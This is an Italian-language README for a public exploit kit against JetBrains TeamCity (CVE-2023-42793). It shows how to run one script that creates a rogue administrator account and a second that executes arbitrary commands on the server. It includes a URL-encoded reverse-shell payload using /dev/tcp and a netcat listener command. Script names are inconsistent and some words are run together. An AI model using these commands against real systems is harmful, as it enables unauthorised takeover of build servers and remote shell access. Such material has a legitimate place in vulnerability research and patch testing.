
JetBrains TeamCity 2023.05.3 - Esecuzione remota di codice (RCE), CVE-2023-42793
usa prima
exploit.pyper creare un account amministratore e poirce.pyper eseguire comandi sul target. Per la reverse shell controlla questo
Questo script sfrutta la CVE-2023-42793 per creare un account amministratore su un server TeamCity. Invia una richiesta POST all'URL target per creare un utente amministratore con credenziali specificate o casuali.
python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]
-u, --url URL: URL target (obbligatorio)-v, --verbose: Abilita la modalità verbosa-n, --username USERNAME: Specifica nome utente (predefinito: casuale)-p, --password PASSWORD: Specifica password (predefinita: casuale)-e, --email EMAIL: Specifica email (predefinita: casuale)-t, --token-file: File dove salvare il tokenpip3 install -r requirements.txtSfruttamento con nome utente, password ed email casuali:
python exploit.py -u http://target.com
Sfruttamento con nome utente, password ed email specificati:
python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
In caso di sfruttamento riuscito, lo script stampa l'URL, il nome utente e la password dell'account amministratore creato, quindi salva l'output nel file del token.
Questo script permette di eseguire comandi su un server TeamCity vulnerabile sfruttando la CVE-2023-42793. Prima abilita i processi di debug e poi esegue il comando specificato utilizzando gli endpoint API appropriati.
python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]
-u, --url URL: URL target (obbligatorio)-t, --token-file: Specifica il file contenente il token-c, --command COMANDO: Specifica il comando da eseguire (RCE)-P, --port PORT: Specifica la porta (predefinita 80)Sfruttamento con un comando specificato:
python rce.py -u http://target.com -t token -c "whoami"
python3 rce.py -u http://target.com -t token -c '"/bin/bash"¶ms="-c"¶ms="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
nc -nvlp 5555